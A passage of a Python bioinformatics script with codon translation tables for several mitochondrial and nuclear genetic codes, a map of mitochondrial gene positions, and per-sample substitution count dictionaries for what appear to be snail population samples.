'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt code
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
seqDict, seqList, codonDict = buildCodonDict(fasta)
popList = []
sexList = []
outList = []
thetaUSDict = {">$Heron2":(3,2598), ">$clone_1":(2,2598), ">$Rotoiti_1_4n":(2,2594.35416672), ">$AC51":(0,2598.33333333), ">$Heron_mitochondrion":(0,2599), ">$Grasmere_6_3n":(0,2599.62500001), ">$Poerua_triploid":(2,2597), ">$Brunner_6_3n":(2,2592.9583334), ">$McGregor":(0,2599), ">$Poerua_72_4n":(0,2605.47916675), ">$Gunn":(4,2597.66666667), ">$Grasmere_1_4n":(1,2628.66666703), ">$clone_7":(0,2592.85416667), ">$DenmarkA":(0,2593.125), ">$Duluth":(0,2591.52083333), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(3,2593.79166667), ">$Waik37":(0,2586.58333333), ">$Waik372":(4,2589.25), ">$Tarawera":(0,2586.58333333), ">$Kaniere_triploid":(1,2586.58333333), ">$Waik36":(14,2586.91666667), ">$WalesC":(2,2584.91666667), ">$Brunner_2_4n":(0,2593.60416674), ">$Lady":(9,2598.66666667), ">$Kaniere_1_2n":(9,2598.33333333), ">$Rotoroa_1_2n":(13,2598.58333338), ">$AlexMap":(0,2592.33333333), ">$Alexsex":(0,2592.33333333), ">$Yellow_Contig_56":(0,2592.33333333), ">$Ianthe":(4,2597), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(4,2595)}
thetaUmeanCDict = {">$Heron2":(1,4307.57142857), ">$clone_1":(0,4307.80952381), ">$Rotoiti_1_4n":(0,4283.76190474), ">$AC51":(0,4307.04761905), ">$Heron_mitochondrion":(0,4307.04761905), ">$Grasmere_6_3n":(0,4299.99999999), ">$Poerua_triploid":(1,4308.90476191), ">$Brunner_6_3n":(3,4277.5238095), ">$McGregor":(0,4307.14285714), ">$Poerua_72_4n":(0,4263.99999996), ">$Gunn":(1,4308.57142857), ">$Grasmere_1_4n":(1,4132.47619032), ">$clone_7":(0,4310.19047619), ">$DenmarkA":(0,4310.04761905), ">$Duluth":(0,4310.80952381), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,4308.85714286), ">$Waik37":(0,4311.76190476), ">$Waik372":(4,4314.52380952), ">$Tarawera":(0,4312.28571428), ">$Kaniere_triploid":(0,4312.80952381), ">$Waik36":(6,4313.14285714), ">$WalesC":(3,4315), ">$Brunner_2_4n":(3,4273.47619044), ">$Lady":(5,4307.52380952), ">$Kaniere_1_2n":(2,4308.23809524), ">$Rotoroa_1_2n":(4,4280.80952379), ">$AlexMap":(0,4311), ">$Alexsex":(0,4311), ">$Yellow_Contig_56":(0,4311), ">$Ianthe":(1,4308.52380952), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,4309.19047619)}
thetaUmeanRDict = {">$Heron2":(0,4308.42857143), ">$clone_1":(0,4308.19047619), ">$Rotoiti_1_4n":(0,4335.88392856), ">$AC51":(1,4308.61904762), ">$Heron_mitochondrion":(0,4307.95238095), ">$Grasmere_6_3n":(1,4314.375), ">$Poerua_triploid":(0,4308.09523809), ">$Brunner_6_3n":(3,4343.51785713), ">$McGregor":(0,4307.85714286), ">$Poerua_72_4n":(0,4344.52083332), ">$Gunn":(3,4307.76190476), ">$Grasmere_1_4n":(1,4452.85714279999), ">$clone_7":(0,4310.95535714), ">$DenmarkA":(0,4310.82738095), ">$Duluth":(1,4311.66964286), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,4311.35119048), ">$Waik37":(1,4315.65476191), ">$Waik372":(3,4310.22619048), ">$Tarawera":(0,4315.13095238), ">$Kaniere_triploid":(0,4314.60714286), ">$Waik36":(0,4313.94047619), ">$WalesC":(0,4314.08333333), ">$Brunner_2_4n":(3,4346.91964285), ">$Lady":(1,4307.80952381), ">$Kaniere_1_2n":(0,4307.42857143), ">$Rotoroa_1_2n":(1,4334.60714285), ">$AlexMap":(0,4310.66666667), ">$Alexsex":(0,4310.66666667), ">$Yellow_Contig_56":(0,4310.66666667), ">$Ianthe":(0,4308.47619048), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,4309.80952381)}
thetaUC1Dict = {">$Heron2":(1,6320.33333333), ">$clone_1":(0,6319.66666667), ">$Rotoiti_1_4n":(0,6264.68749995), ">$AC51":(0,6318.66666667), ">$Heron_mitochondrion":(0,6319.33333333), ">$Grasmere_6_3n":(1,6307.62499999), ">$Poerua_triploid":(1,6321.66666667), ">$Brunner_6_3n":(4,6262.95833327), ">$McGregor":(0,6319), ">$Poerua_72_4n":(0,6232.81249992), ">$Gunn":(2,6324.33333333), ">$Grasmere_1_4n":(1,5990.99999963), ">$clone_7":(0,6322.52083333), ">$DenmarkA":(0,6322.45833333), ">$Duluth":(1,6323.85416667), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,6320.125), ">$Waik37":(0,6327.25), ">$Waik372":(6,6330.58333333), ">$Tarawera":(0,6329.25), ">$Kaniere_triploid":(0,6330.58333333), ">$Waik36":(6,6330.25), ">$WalesC":(3,6333.25), ">$Brunner_2_4n":(4,6259.27083326), ">$Lady":(6,6318), ">$Kaniere_1_2n":(2,6320.33333333), ">$Rotoroa_1_2n":(4,6271.58333329), ">$AlexMap":(0,6326.33333333), ">$Alexsex":(0,6326.33333333), ">$Yellow_Contig_56":(0,6326.33333333), ">$Ianthe":(1,6321.33333333), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,6321)}
thetaUC2Dict = {">$Heron2":(1,5090.33333333), ">$clone_1":(0,5091.33333333), ">$Rotoiti_1_4n":(0,5085.97916662), ">$AC51":(1,5089.33333333), ">$Heron_mitochondrion":(0,5088.66666667), ">$Grasmere_6_3n":(0,5084.70833332), ">$Poerua_triploid":(1,5092), ">$Brunner_6_3n":(4,5076.37499994), ">$McGregor":(0,5089.66666667), ">$Poerua_72_4n":(0,5059.52083325), ">$Gunn":(2,5090.33333333), ">$Grasmere_1_4n":(2,4999.33333297), ">$clone_7":(0,5092.14583333), ">$DenmarkA":(0,5091.875), ">$Duluth":(0,5093.47916667), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,5091.20833333), ">$Waik37":(0,5096.75), ">$Waik372":(4,5097.41666667), ">$Tarawera":(0,5097.08333333), ">$Kaniere_triploid":(0,5096.75), ">$Waik36":(3,5100.75), ">$WalesC":(1,5101.75), ">$Brunner_2_4n":(3,5082.39583326), ">$Lady":(4,5089), ">$Kaniere_1_2n":(0,5090), ">$Rotoroa_1_2n":(5,5078.41666662), ">$AlexMap":(0,5097.33333333), ">$Alexsex":(0,5097.33333333), ">$Yellow_Contig_56":(0,5097.33333333), ">$Ianthe":(1,5093), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,5095.33333333)}
thetaUC3Dict = {">$Heron2":(0,2945), ">$clone_1":(0,2944.66666667), ">$Rotoiti_1_4n":(0,2932.12499995), ">$AC51":(0,2945), ">$Heron_mitochondrion":(0,2944.66666667), ">$Grasmere_6_3n":(0,2941.74999999), ">$Poerua_triploid":(1,2945.66666667), ">$Brunner_6_3n":(2,2925.4166666), ">$McGregor":(0,2945), ">$Poerua_72_4n":(0,2926.20833325), ">$Gunn":(1,2944), ">$Grasmere_1_4n":(0,2832.33333297), ">$clone_7":(0,2949.79166667), ">$DenmarkA":(0,2949.75), ">$Duluth":(0,2949.125), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,2948.75), ">$Waik37":(0,2950.5), ">$Waik372":(1,2952.83333333), ">$Tarawera":(0,2950.5), ">$Kaniere_triploid":(0,2950.83333333), ">$Waik36":(6,2947.16666667), ">$WalesC":(3,2950.83333333), ">$Brunner_2_4n":(3,2917.29166659), ">$Lady":(4,2947.33333333), ">$Kaniere_1_2n":(2,2945.66666667), ">$Rotoroa_1_2n":(1,2928.16666662), ">$AlexMap":(0,2946.66666667), ">$Alexsex":(0,2946.66666667), ">$Yellow_Contig_56":(0,2946.66666667), ">$Ianthe":(1,2945.33333333), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,2945.33333333)}
thetaUC4Dict = {">$Heron2":(0,3419.66666667), ">$clone_1":(0,3419.33333333), ">$Rotoiti_1_4n":(0,3422.85416662), ">$AC51":(0,3419), ">$Heron_mitochondrion":(0,3419), ">$Grasmere_6_3n":(0,3416.95833332), ">$Poerua_triploid":(1,3421), ">$Brunner_6_3n":(3,3421.95833327), ">$McGregor":(0,3420), ">$Poerua_72_4n":(0,3422.97916658), ">$Gunn":(2,3420), ">$Grasmere_1_4n":(0,3382.99999963), ">$clone_7":(0,3422.6875), ">$DenmarkA":(0,3422.45833333), ">$Duluth":(0,3422.02083333), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,3421.79166667), ">$Waik37":(0,3424.58333333), ">$Waik372":(0,3428.25), ">$Tarawera":(0,3424.91666667), ">$Kaniere_triploid":(0,3423.58333333), ">$Waik36":(6,3420.25), ">$WalesC":(3,3423.25), ">$Brunner_2_4n":(3,3405.10416659), ">$Lady":(4,3423), ">$Kaniere_1_2n":(2,3420.33333333), ">$Rotoroa_1_2n":(1,3414.91666662), ">$AlexMap":(0,3420.66666667), ">$Alexsex":(0,3420.66666667), ">$Yellow_Contig_56":(0,3420.66666667), ">$Ianthe":(1,3419.33333333), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,3420)}
thetaUC5Dict = {">$Heron2":(0,4382.33333333), ">$clone_1":(0,4382.33333333), ">$Rotoiti_1_4n":(0,4363.35416667), ">$AC51":(0,4382), ">$Heron_mitochondrion":(0,4382.33333333), ">$Grasmere_6_3n":(1,4375.95833333), ">$Poerua_triploid":(1,4383.33333333), ">$Brunner_6_3n":(4,4354.95833333), ">$McGregor":(0,4382), ">$Poerua_72_4n":(0,4354.14583333), ">$Gunn":(2,4382.66666667), ">$Grasmere_1_4n":(0,4238), ">$clone_7":(0,4385.1875), ">$DenmarkA":(0,4385.125), ">$Duluth":(1,4384.85416667), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,4383.79166667), ">$Waik37":(0,4385.58333333), ">$Waik372":(2,4390.58333333), ">$Tarawera":(0,4385.58333333), ">$Kaniere_triploid":(0,4386.25), ">$Waik36":(6,4383.58333333), ">$WalesC":(3,4385.58333333), ">$Brunner_2_4n":(4,4338.9375), ">$Lady":(6,4385.33333333), ">$Kaniere_1_2n":(2,4383.33333333), ">$Rotoroa_1_2n":(2,4354.91666667), ">$AlexMap":(0,4381.66666667), ">$Alexsex":(0,4381.66666667), ">$Yellow_Contig_56":(0,4381.66666667), ">$Ianthe":(1,4384.66666667), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,4384)}
thetaUC6Dict = {">$Heron2":(1,4124.66666667), ">$clone_1":(0,4125.66666667), ">$Rotoiti_1_4n":(0,4084.39583338), ">$AC51":(0,4124.66666667), ">$Heron_mitochondrion":(0,4125), ">$Grasmere_6_3n":(0,4112.54166668), ">$Poerua_triploid":(1,4126), ">$Brunner_6_3n":(3,4075.2083334), ">$McGregor":(0,4124.33333333), ">$Poerua_72_4n":(0,4050.43750008), ">$Gunn":(0,4126.33333333), ">$Grasmere_1_4n":(1,3848.3333337), ">$clone_7":(0,4126.89583333), ">$DenmarkA":(0,4127.04166667), ">$Duluth":(0,4128.5625), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,4126.04166667), ">$Waik37":(0,4123.41666667), ">$Waik372":(5,4126.08333333), ">$Tarawera":(0,4124.08333333), ">$Kaniere_triploid":(0,4125.75), ">$Waik36":(3,4130.08333333), ">$WalesC":(1,4129.75), ">$Brunner_2_4n":(3,4078.47916674), ">$Lady":(5,4121), ">$Kaniere_1_2n":(0,4126.33333333), ">$Rotoroa_1_2n":(4,4085.08333338), ">$AlexMap":(0,4127.33333333), ">$Alexsex":(0,4127.33333333), ">$Yellow_Contig_56":(0,4127.33333333), ">$Ianthe":(1,4123.66666667), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,4125)}
thetaUC7Dict = {">$Heron2":(1,3870.66666667), ">$clone_1":(0,3871.66666667), ">$Rotoiti_1_4n":(0,3832.9375), ">$AC51":(0,3870.66666667), ">$Heron_mitochondrion":(0,3870.33333333), ">$Grasmere_6_3n":(0,3860.45833333), ">$Poerua_triploid":(1,3872.66666667), ">$Brunner_6_3n":(3,3825.79166667), ">$McGregor":(0,3870), ">$Poerua_72_4n":(0,3801.89583333), ">$Gunn":(0,3872.33333333), ">$Grasmere_1_4n":(1,3635.33333333), ">$clone_7":(0,3872.10416667), ">$DenmarkA":(0,3871.625), ">$Duluth":(0,3873.77083333), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,3870.29166667), ">$Waik37":(0,3874.25), ">$Waik372":(4,3875.91666667), ">$Tarawera":(0,3874.58333333), ">$Kaniere_triploid":(0,3875.91666667), ">$Waik36":(3,3879.91666667), ">$WalesC":(1,3880.58333333), ">$Brunner_2_4n":(3,3832.85416667), ">$Lady":(4,3869), ">$Kaniere_1_2n":(0,3871.66666667), ">$Rotoroa_1_2n":(4,3832.58333333), ">$AlexMap":(0,3877), ">$Alexsex":(0,3877), ">$Yellow_Contig_56":(0,3877), ">$Ianthe":(1,3872.33333333), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,3873.66666667)}
thetaUR1Dict = {">$Heron2":(0,2295.66666667), ">$clone_1":(0,2296.33333333), ">$Rotoiti_1_4n":(0,2354.95833333), ">$AC51":(1,2297), ">$Heron_mitochondrion":(0,2295.66666667), ">$Grasmere_6_3n":(0,2306.75), ">$Poerua_triploid":(0,2295.33333333), ">$Brunner_6_3n":(2,2358.08333333), ">$McGregor":(0,2296), ">$Poerua_72_4n":(0,2375.70833333), ">$Gunn":(2,2292), ">$Grasmere_1_4n":(1,2594.33333333), ">$clone_7":(0,2298.625), ">$DenmarkA":(0,2298.41666667), ">$Duluth":(0,2298.625), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,2300.08333333), ">$Waik37":(1,2300.16666667), ">$Waik372":(1,2294.16666667), ">$Tarawera":(0,2298.16666667), ">$Kaniere_triploid":(0,2296.83333333), ">$Waik36":(0,2296.83333333), ">$WalesC":(0,2295.83333333), ">$Brunner_2_4n":(2,2361.125), ">$Lady":(0,2297.33333333), ">$Kaniere_1_2n":(0,2295.33333333), ">$Rotoroa_1_2n":(1,2343.83333333), ">$AlexMap":(0,2295.33333333), ">$Alexsex":(0,2295.33333333), ">$Yellow_Contig_56":(0,2295.33333333), ">$Ianthe":(0,2295.66666667), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,2298)}
thetaUR2Dict = {">$Heron2":(0,3525.66666667), ">$clone_1":(0,3524.66666667), ">$Rotoiti_1_4n":(0,3533.66666667), ">$AC51":(0,3526.33333333), ">$Heron_mitochondrion":(0,3526.33333333), ">$Grasmere_6_3n":(1,3529.66666667), ">$Poerua_triploid":(0,3525), ">$Brunner_6_3n":(2,3544.66666667), ">$McGregor":(0,3525.33333333), ">$Poerua_72_4n":(0,3549), ">$Gunn":(2,3526), ">$Grasmere_1_4n":(0,3586), ">$clone_7":(0,3529), ">$DenmarkA":(0,3529), ">$Duluth":(1,3529), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,3529), ">$Waik37":(1,3530.66666667), ">$Waik372":(3,3527.33333333), ">$Tarawera":(0,3530.33333333), ">$Kaniere_triploid":(0,3530.66666667), ">$Waik36":(3,3526.33333333), ">$WalesC":(2,3527.33333333), ">$Brunner_2_4n":(3,3538), ">$Lady":(2,3526.33333333), ">$Kaniere_1_2n":(2,3525.66666667), ">$Rotoroa_1_2n":(0,3537), ">$AlexMap":(0,3524.33333333), ">$Alexsex":(0,3524.33333333), ">$Yellow_Contig_56":(0,3524.33333333), ">$Ianthe":(0,3524), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,3523.66666667)}
thetaUR3Dict = {">$Heron2":(1,5671), ">$clone_1":(0,5671.33333333), ">$Rotoiti_1_4n":(0,5687.52083333), ">$AC51":(1,5670.66666667), ">$Heron_mitochondrion":(0,5670.33333333), ">$Grasmere_6_3n":(1,5672.625), ">$Poerua_triploid":(0,5671.33333333), ">$Brunner_6_3n":(4,5695.625), ">$McGregor":(0,5670), ">$Poerua_72_4n":(0,5682.3125), ">$Gunn":(3,5672.33333333), ">$Grasmere_1_4n":(2,5753), ">$clone_7":(0,5671.35416667), ">$DenmarkA":(0,5671.125), ">$Duluth":(1,5673.35416667), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,5671.45833333), ">$Waik37":(1,5676.91666667), ">$Waik372":(6,5671.91666667), ">$Tarawera":(0,5676.91666667), ">$Kaniere_triploid":(0,5676.58333333), ">$Waik36":(0,5679.91666667), ">$WalesC":(0,5678.25), ">$Brunner_2_4n":(3,5703.10416667), ">$Lady":(2,5668), ">$Kaniere_1_2n":(0,5670), ">$Rotoroa_1_2n":(4,5687.25), ">$AlexMap":(0,5675), ">$Alexsex":(0,5675), ">$Yellow_Contig_56":(0,5675), ">$Ianthe":(0,5671.66666667), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,5673.66666667)}
thetaUR4Dict = {">$Heron2":(1,5196.33333333), ">$clone_1":(0,5196.66666667), ">$Rotoiti_1_4n":(0,5196.79166667), ">$AC51":(1,5196.66666667), ">$Heron_mitochondrion":(0,5196), ">$Grasmere_6_3n":(1,5197.41666667), ">$Poerua_triploid":(0,5196), ">$Brunner_6_3n":(3,5199.08333333), ">$McGregor":(0,5195), ">$Poerua_72_4n":(0,5185.54166667), ">$Gunn":(2,5196.33333333), ">$Grasmere_1_4n":(2,5202.33333333), ">$clone_7":(0,5198.45833333), ">$DenmarkA":(0,5198.41666667), ">$Duluth":(1,5200.45833333), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,5198.41666667), ">$Waik37":(1,5202.83333333), ">$Waik372":(7,5196.5), ">$Tarawera":(0,5202.5), ">$Kaniere_triploid":(0,5203.83333333), ">$Waik36":(0,5206.83333333), ">$WalesC":(0,5205.83333333), ">$Brunner_2_4n":(3,5215.29166667), ">$Lady":(2,5192.33333333), ">$Kaniere_1_2n":(0,5195.33333333), ">$Rotoroa_1_2n":(4,5200.5), ">$AlexMap":(0,5201), ">$Alexsex":(0,5201), ">$Yellow_Contig_56":(0,5201), ">$Ianthe":(0,5197.66666667), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,5199)}
thetaUR5Dict = {">$Heron2":(1,4233.66666667), ">$clone_1":(0,4233.66666667), ">$Rotoiti_1_4n":(0,4256.29166662), ">$AC51":(1,4233.66666667), ">$Heron_mitochondrion":(0,4232.66666667), ">$Grasmere_6_3n":(0,4238.41666665), ">$Poerua_triploid":(0,4233.66666667), ">$Brunner_6_3n":(2,4266.08333327), ">$McGregor":(0,4233), ">$Poerua_72_4n":(0,4254.37499992), ">$Gunn":(2,4233.66666667), ">$Grasmere_1_4n":(2,4347.33333297), ">$clone_7":(0,4235.95833333), ">$DenmarkA":(0,4235.75), ">$Duluth":(0,4237.625), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,4236.41666667), ">$Waik37":(1,4241.83333333), ">$Waik372":(5,4234.16666667), ">$Tarawera":(0,4241.83333333), ">$Kaniere_triploid":(0,4241.16666667), ">$Waik36":(0,4243.5), ">$WalesC":(0,4243.5), ">$Brunner_2_4n":(2,4281.45833326), ">$Lady":(0,4230), ">$Kaniere_1_2n":(0,4232.33333333), ">$Rotoroa_1_2n":(3,4260.49999996), ">$AlexMap":(0,4240), ">$Alexsex":(0,4240), ">$Yellow_Contig_56":(0,4240), ">$Ianthe":(0,4232.33333333), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,4235)}
thetaUR6Dict = {">$Heron2":(0,4491.33333333), ">$clone_1":(0,4490.33333333), ">$Rotoiti_1_4n":(0,4535.25000005), ">$AC51":(1,4491), ">$Heron_mitochondrion":(0,4490), ">$Grasmere_6_3n":(1,4501.83333335), ">$Poerua_triploid":(0,4491), ">$Brunner_6_3n":(3,4545.8333334), ">$McGregor":(0,4490.66666667), ">$Poerua_72_4n":(0,4558.08333342), ">$Gunn":(4,4490), ">$Grasmere_1_4n":(1,4737.00000037), ">$clone_7":(0,4494.25), ">$DenmarkA":(0,4493.83333333), ">$Duluth":(1,4493.91666667), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,4494.16666667), ">$Waik37":(1,4504), ">$Waik372":(2,4498.66666667), ">$Tarawera":(0,4503.33333333), ">$Kaniere_triploid":(0,4501.66666667), ">$Waik36":(3,4497), ">$WalesC":(2,4499.33333333), ">$Brunner_2_4n":(3,4541.91666674), ">$Lady":(1,4494.33333333), ">$Kaniere_1_2n":(2,4489.33333333), ">$Rotoroa_1_2n":(1,4530.33333338), ">$AlexMap":(0,4494.33333333), ">$Alexsex":(0,4494.33333333), ">$Yellow_Contig_56":(0,4494.33333333), ">$Ianthe":(0,4493.33333333), 